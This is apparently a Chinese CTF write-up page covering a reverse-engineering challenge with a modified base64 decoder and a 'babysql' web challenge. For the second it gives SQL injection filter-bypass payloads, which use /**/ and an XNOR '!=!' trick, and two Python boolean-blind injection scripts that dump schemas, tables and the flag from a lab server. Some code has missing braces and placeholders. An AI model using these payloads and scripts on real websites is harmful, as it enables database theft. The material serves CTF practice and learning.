NSSCTF逆向2023题目《debase64》

Posted 2023-06-02 Corax0o0

总览

debase64 变种base64解密

题目debase64

解法

这道题是有点抽象的。
首先打开看看是啥东西

输入什么东西都不给回显
那打开exeinfo看看

无壳32 放ida看看吧

main函数就是长这个样子
最关键的就是这个

应该就是这个解码的函数，传入了我们输入的v15 打开看看

里面长这个样子，通过移位可以依稀看到一些base64的痕迹。
仔细分析一下 上面那坨代码大概就是赋四个值。
这个时候我脑子有点没转过来 才发现这个是debase64也就是解密
所以我们输入的就是base64之后的秘闻 所以是四个组成三个字符
这样一看四个 也能理解了。
但是下面这一坨

说实话跟普通的base64是不一样的，我也有点看懵逼
看看别人的wp，这个地方意思就是 逆序处理base64，意思就是按照逆向处理的字符是四个一组反着来的
。
ok
现在的逆向思路就是把里面的这个

按照base64加密出来人，然后手动解开，但是要注意后面几位是0 也就是我们还需要自己爆破 来和题目给的md5值比较。
脚本如下

解出来的就是这样
Ru0Yllae0nKys4Bw/w
Y0uReallyKn0wB4s/w==
里面的/w是错的 最后三个是等号
Y0uReallyKn0wB4s？===
爆破出来

flag Y0uReallyKn0wB4s3===

[NSSCTF 2022 Spring Recruit]babysql

https://www.ctfer.vip/problem/2075

根据输入框的提示传入tarnish返回如下

简单测试下发现黑名单：hacker!!black_list is /if|and|\\s|#|--/i

把注释符号都过滤了，可以使用闭合的方法构造注入，空格使用/**/绕过

这里采用同或(!=!)来构造注入

同或 !=! 的逻辑：
1 !=! 1 == 1
1 !=! 0 == 0
0 !=! 1 == 0
0 !=! 0 == 1

mysql> select 1 !=! 0 !=! 1;
+---------------+
| 1 !=! 0 !=! 1 |
+---------------+
|             0 |
+---------------+
1 row in set (0.01 sec)

mysql> select 1 !=! 1 !=! 1;
+---------------+
| 1 !=! 1 !=! 1 |
+---------------+
|             1 |
+---------------+
1 row in set (0.00 sec)

mysql> select * from users where uid=1;
+-----+----------+----------+
| uid | username | password |
+-----+----------+----------+
|   1 | admin    | admin    |
+-----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where uid=1 !=! 0 !=! 1;
+-----+---------------+----------------------------------+
| uid | username      | password                         |
+-----+---------------+----------------------------------+
|   2 | mochu7        | mochu7                           |
|   3 | flag          | flagThe_Sql_F14g_0f_mochu7     |
|   0 | Administrator | 874a0300d72a3676c4413ce52454eff7 |
|   4 | testuser      | 123456                           |
+-----+---------------+----------------------------------+
4 rows in set (0.00 sec)

mysql> select * from users where uid=1 !=! 1 !=! 1;
+-----+----------+----------+
| uid | username | password |
+-----+----------+----------+
|   1 | admin    | admin    |
+-----+----------+----------+
1 row in set (0.00 sec)

username=tarnish'!=!(1)!=!'1  (True !=! True !=! True) == True
username=tarnish'!=!(0)!=!'1  (True !=! False !=! True) == False

布尔盲注，脚本跑

import requests

asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`|~'
burp0_url = "http://1.14.71.254:28085/"
burp0_headers = "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0", 
				 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
				 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 
				 "Accept-Encoding": "gzip, deflate", 
				 "Content-Type": "application/x-www-form-urlencoded"
				 
content = ''
for i in range(1, 100):
	for s in asc_str:
		# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),,1))=)/**/!=!/**/'1".format(i, ord(s))
		# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),,1))=)/**/!=!/**/'1".format(i, ord(s))
		# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),,1))=)/**/!=!/**/'1".format(i, ord(s))
		payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),,1))=)/**/!=!/**/'1".format(i, ord(s))	
		burp0_data = "username": payload
		resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
		if 'string(39)' in resp.text:
			content += s
			print(content)

最笨的办法，比较慢，需要多等一会，追求效率可以使用二分法。

二分法

import requests

asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`|~'
burp0_url = "http://1.14.71.254:28758/"
burp0_headers = "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0", 
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
                 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 
                 "Accept-Encoding": "gzip, deflate", 
                 "Content-Type": "application/x-www-form-urlencoded"
                 
content = ''

for pos in range(1, 100):
    min_num = 32
    max_num = 126
    mid_num = (min_num + max_num) // 2
    while(min_num < max_num):
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),,1))>)/**/!=!/**/'1".format(pos, mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),,1))>)/**/!=!/**/'1".format(pos, mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),,1))>)/**/!=!/**/'1".format(pos, mid_num)
        payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),,1))>)/**/!=!/**/'1".format(pos, mid_num)
        burp0_data = "username": payload
        resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if 'string(39)' in resp.text:
            min_num = mid_num + 1
        else:
            max_num = mid_num
        mid_num = (min_num + max_num) // 2
    content += chr(min_num)
    print(content)